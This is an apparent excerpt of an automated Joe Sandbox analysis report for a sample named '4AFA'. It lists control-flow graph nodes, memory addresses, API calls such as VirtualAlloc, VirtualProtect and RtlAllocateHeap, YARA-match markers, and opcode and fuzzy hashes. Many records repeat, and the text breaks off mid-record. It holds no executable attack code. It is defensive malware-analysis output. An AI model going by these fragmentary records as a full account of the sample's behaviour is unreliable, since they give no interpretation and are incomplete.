                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 208 411915-41191f 209 411921-41192b 208->209 210 41193c-411945 208->210 209->210 213 41192d-41193b 209->213 211 411947 210->211 212 411948-41194d 210->212 211->212 214 411962-411969 212->214 215 41194f-411960 RtlAllocateHeap 212->215 218 411987-41198c 214->218 219 41196b-411974 call 40b6de 214->219 215->214 217 411994-411996 215->217 218->217 221 41198e 218->221 219->212 223 411976-41197b 219->223 221->217 224 411983-411985 223->224 225 41197d 223->225 224->217 225->224
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?), ref: 00411958
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635212560.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_40b000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: c306e2e577ef395a015d6553d6c6b6196e27a397b503b20f24a81e70c5399ec7
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9877d9c0bcdf7dcd72dc65595a5e8628669935695e08092c9abcdca83a7f5164
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c306e2e577ef395a015d6553d6c6b6196e27a397b503b20f24a81e70c5399ec7
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9801D8712212159BEF299F25DD24BFB3754AF41360F04452BE965DB2F0DB78DC80C658
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 226 42c370-42c40c VirtualProtect
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(007B75DC,007B7674,00000040,?,?,0042CE24), ref: 0042C408
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635212560.000000000042C000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0042C000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_42c000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6ab372e5a4c6966e21f8dba7735d910b356df5ef8751ac1ee8ab049f2c9ca1e1
                                                                                                                                                                                                                                                                                                                  • Instruction ID: a6b24d280459cdc9f6b0b6ccd57260f745f809b05250c5f9c75a86d0b23a2800
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ab372e5a4c6966e21f8dba7735d910b356df5ef8751ac1ee8ab049f2c9ca1e1
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B01E8F011AA84DED305CF65BD85B153B64AF98717F10A26DE1458A2B4C7B54250CB2D
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 229 9be78c-9be7c6 call 9bea9f 232 9be7c8-9be7fb VirtualAlloc call 9be819 229->232 233 9be814 229->233 235 9be800-9be812 232->235 233->233 235->233
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009BE7DD
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2636286578.00000000009B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009B9000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_9b9000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1807a6a217fbe598f043870876ba0c21838592f444d0410c42bfdcab1d2b2e74
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82113F79A00208EFDB01DF98CA85E98BFF5AF08750F058094F9489B362D371EA50DF91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 318 402f4c-402f95 call 4012c9 329 402f9a-402fac call 401ad7 call 40283d 318->329 333 402fb1-402fb3 329->333 334 403062-403063 333->334 335 402fb9-402fc3 call 4020fe 333->335 338 402ff1-402ff7 335->338 339 402fc5-402fcf call 402464 335->339 341 403006-40300c 338->341 342 402ff9-403004 338->342 339->334 345 402fd5-402fdf call 402557 339->345 344 403011-403031 call 401a1d 341->344 342->344 351 403034-40305a 344->351 352 403027-40302d 344->352 345->334 353 402fe5-402fef call 4021d5 345->353 360 403050-403056 351->360 361 40305d call 4012c9 351->361 352->351 353->334 353->338 360->361 361->334
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635169795.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e9b993999509546feb100a58aa110ad3cb7688ffbb81d0fa762ca4079a48b2a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: de7d7c02a2acef888e5867cfcd6b7934ce3349bf6f00ed6c70a67cfb2526d450
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e9b993999509546feb100a58aa110ad3cb7688ffbb81d0fa762ca4079a48b2a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85117B30209202EADF156E51CE0A97E3A7D9B05385F204177AD06B91D9DB7D4F43761F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 363 402f52-402f95 call 4012c9 373 402f9a-402fac call 401ad7 call 40283d 363->373 377 402fb1-402fb3 373->377 378 403062-403063 377->378 379 402fb9-402fc3 call 4020fe 377->379 382 402ff1-402ff7 379->382 383 402fc5-402fcf call 402464 379->383 385 403006-40300c 382->385 386 402ff9-403004 382->386 383->378 389 402fd5-402fdf call 402557 383->389 388 403011-403031 call 401a1d 385->388 386->388 395 403034-40305a 388->395 396 403027-40302d 388->396 389->378 397 402fe5-402fef call 4021d5 389->397 404 403050-403056 395->404 405 40305d call 4012c9 395->405 396->395 397->378 397->382 404->405 405->378
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635169795.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b24d3a33767229071373dc0e4bc5281101f678a28a0d6d9d93a0e5b59d76b53e
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 96ccb990ef0822e5f343242b1b26bef68817e0a9053a80ecc0d732bd9761534d
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b24d3a33767229071373dc0e4bc5281101f678a28a0d6d9d93a0e5b59d76b53e
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0119A30109202EADF156E61CE0A97E7A7D5B04789F204177AD02B51D9DA7D8F02761F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 407 402f65-402f95 call 4012c9 418 402f9a-402fac call 401ad7 call 40283d 407->418 422 402fb1-402fb3 418->422 423 403062-403063 422->423 424 402fb9-402fc3 call 4020fe 422->424 427 402ff1-402ff7 424->427 428 402fc5-402fcf call 402464 424->428 430 403006-40300c 427->430 431 402ff9-403004 427->431 428->423 434 402fd5-402fdf call 402557 428->434 433 403011-403031 call 401a1d 430->433 431->433 440 403034-40305a 433->440 441 403027-40302d 433->441 434->423 442 402fe5-402fef call 4021d5 434->442 449 403050-403056 440->449 450 40305d call 4012c9 440->450 441->440 442->423 442->427 449->450 450->423
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635169795.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8c26e46b8fcb0534e7798632f83f6cc8f35efbb3a5c49321caeccfb920452ad6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: dcd9066e84f85b1db71bcec76c37bbdb528ea78c929ae896bafdd47b114795f1
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c26e46b8fcb0534e7798632f83f6cc8f35efbb3a5c49321caeccfb920452ad6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32119A30109102EADF156E51CE0A97E397D5B00389F204177A902B51E9D67D8F42761F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 452 402f6d-402f95 call 4012c9 458 402f9a-402fac call 401ad7 call 40283d 452->458 462 402fb1-402fb3 458->462 463 403062-403063 462->463 464 402fb9-402fc3 call 4020fe 462->464 467 402ff1-402ff7 464->467 468 402fc5-402fcf call 402464 464->468 470 403006-40300c 467->470 471 402ff9-403004 467->471 468->463 474 402fd5-402fdf call 402557 468->474 473 403011-403031 call 401a1d 470->473 471->473 480 403034-40305a 473->480 481 403027-40302d 473->481 474->463 482 402fe5-402fef call 4021d5 474->482 489 403050-403056 480->489 490 40305d call 4012c9 480->490 481->480 482->463 482->467 489->490 490->463
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635169795.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 20a03d219598f0df1e7dc4eafc854c05467850cbfbeb8b8f149aa68e52af2860
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 688ca8f5771d210c92d7681a03fb36fa71fbb15ee33cdd6160c55921e92d0068
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20a03d219598f0df1e7dc4eafc854c05467850cbfbeb8b8f149aa68e52af2860
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E11543020A102EADF156E51CE0696E3A6D5F00389F204177AD06B91E9D77E9F02B61F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 492 402f76-402f95 call 4012c9 498 402f9a-402fac call 401ad7 call 40283d 492->498 502 402fb1-402fb3 498->502 503 403062-403063 502->503 504 402fb9-402fc3 call 4020fe 502->504 507 402ff1-402ff7 504->507 508 402fc5-402fcf call 402464 504->508 510 403006-40300c 507->510 511 402ff9-403004 507->511 508->503 514 402fd5-402fdf call 402557 508->514 513 403011-403031 call 401a1d 510->513 511->513 520 403034-40305a 513->520 521 403027-40302d 513->521 514->503 522 402fe5-402fef call 4021d5 514->522 529 403050-403056 520->529 530 40305d call 4012c9 520->530 521->520 522->503 522->507 529->530 530->503
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635169795.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 97291b54e9898d08dfc5e64c3ea3a3c78675914eef1c19d2072e3da9afafad71
                                                                                                                                                                                                                                                                                                                  • Instruction ID: dab0701b18d09e942deaf9d56955b91e8f97b7c2544acb4aca363d1f9516e228
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97291b54e9898d08dfc5e64c3ea3a3c78675914eef1c19d2072e3da9afafad71
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F011543020A105EADF15AE518E4696E2A6D5F04389F204077AD06B81EED77D8F02B61F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 532 402f90-402fac call 4012c9 call 401ad7 call 40283d 541 402fb1-402fb3 532->541 542 403062-403063 541->542 543 402fb9-402fc3 call 4020fe 541->543 546 402ff1-402ff7 543->546 547 402fc5-402fcf call 402464 543->547 549 403006-40300c 546->549 550 402ff9-403004 546->550 547->542 553 402fd5-402fdf call 402557 547->553 552 403011-403031 call 401a1d 549->552 550->552 559 403034-40305a 552->559 560 403027-40302d 552->560 553->542 561 402fe5-402fef call 4021d5 553->561 568 403050-403056 559->568 569 40305d call 4012c9 559->569 560->559 561->542 561->546 568->569 569->542
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635169795.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 92c014d68bd6d665392e3c2264218cd0fbb565a528419b5c075e78622be13422
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5d6d361532b5f0d3c1469d6da3078148c0ca3ec6ae5f6728f5cc94b775a9557c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92c014d68bd6d665392e3c2264218cd0fbb565a528419b5c075e78622be13422
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64115630206106EADF157E618E0697E7E6D5F04349F204077AD02B91E9D77D9F12B62F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 571 402f7d-402f95 call 4012c9 575 402f9a-402fac call 401ad7 call 40283d 571->575 579 402fb1-402fb3 575->579 580 403062-403063 579->580 581 402fb9-402fc3 call 4020fe 579->581 584 402ff1-402ff7 581->584 585 402fc5-402fcf call 402464 581->585 587 403006-40300c 584->587 588 402ff9-403004 584->588 585->580 591 402fd5-402fdf call 402557 585->591 590 403011-403031 call 401a1d 587->590 588->590 597 403034-40305a 590->597 598 403027-40302d 590->598 591->580 599 402fe5-402fef call 4021d5 591->599 606 403050-403056 597->606 607 40305d call 4012c9 597->607 598->597 599->580 599->584 606->607 607->580
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635169795.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1b4a4ea93812f224848606fb2e4949cd72f682ac5b50e019147586c9145e7527
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f5e05b7d392023959d2cc02c27730984ae3b312db72966786264b1bf8ee7270
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b4a4ea93812f224848606fb2e4949cd72f682ac5b50e019147586c9145e7527
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE117330106205EADF15BE61CE06A6E3E6D5F0034AF204077A902B91EAD77D8F02BA1F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040CE16
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C36F: __getptd_noexit.LIBCMT ref: 0040C372
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C36F: __amsg_exit.LIBCMT ref: 0040C37F
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040CE2D
                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0040CE3B
                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040CE4B
                                                                                                                                                                                                                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0040CE5F
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635212560.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_40b000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 938513278-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9bcc65b9e586404d7a983c5f7e4e4df4be43c95e4dc0496e5a8ad7cd5745610c
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 524e95dafa9ab244ebab403f9468e8d86c8144be4547c3e1c71c432ac12cdd64
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bcc65b9e586404d7a983c5f7e4e4df4be43c95e4dc0496e5a8ad7cd5745610c
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAF06232944710DAD6217BAAE847B4E3290AF04B28F14837FE414762D2CB7C59418A9D
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040C287
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F237: __mtinitlocknum.LIBCMT ref: 0040F24D
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F237: __amsg_exit.LIBCMT ref: 0040F259
                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040C2A8
                                                                                                                                                                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 0040C2C6
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635212560.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_40b000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __lock$___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                                                                                                  • String ID: `(@
                                                                                                                                                                                                                                                                                                                  • API String ID: 2123130959-2618817800
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 42d4eac59c75bd4bb9ef71fe085cae6a7713d92b0d6ac70f13f8778148bcfffd
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0b1021e3bdfdbeaa2d46212240949e222bf8b4839ee79c00bcde838dfb8acc1a
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42d4eac59c75bd4bb9ef71fe085cae6a7713d92b0d6ac70f13f8778148bcfffd
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B016175804700DFD720AFA6D94A749FBE0AF00318F108A6FE495B66E1CBB8A644CF5D
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635212560.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_40b000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1c0fca6af456c742bdae595cbaff4761b77bc7bdb0477b58c5fd84fae2a7f252
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36117E3200404EBBCF125E84DC418EE3F63BB18356F18891AFA1859131D33ADAB1AB85
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040D1F8
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C36F: __getptd_noexit.LIBCMT ref: 0040C372
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C36F: __amsg_exit.LIBCMT ref: 0040C37F
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040D206
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040D214
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040D21F
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D2EC: __getptd.LIBCMT ref: 0040D2FB
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D2EC: __getptd.LIBCMT ref: 0040D309
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635212560.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_40b000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 803148776-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f5a52aabcc079e302aebbb42224447e2b63cd95a70a99b911ffc354244256226
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ba17d817f08403f5695fa358fbdacd2754bc55a90cf64564de05ecd1a2bca746
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5a52aabcc079e302aebbb42224447e2b63cd95a70a99b911ffc354244256226
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D011C971D10209DFDB00EFA5D885BAD7BB1FF08718F10816EF814A7291DB789A159F58
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040D2FB
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C36F: __getptd_noexit.LIBCMT ref: 0040C372
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C36F: __amsg_exit.LIBCMT ref: 0040C37F
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040D309
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2635212560.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
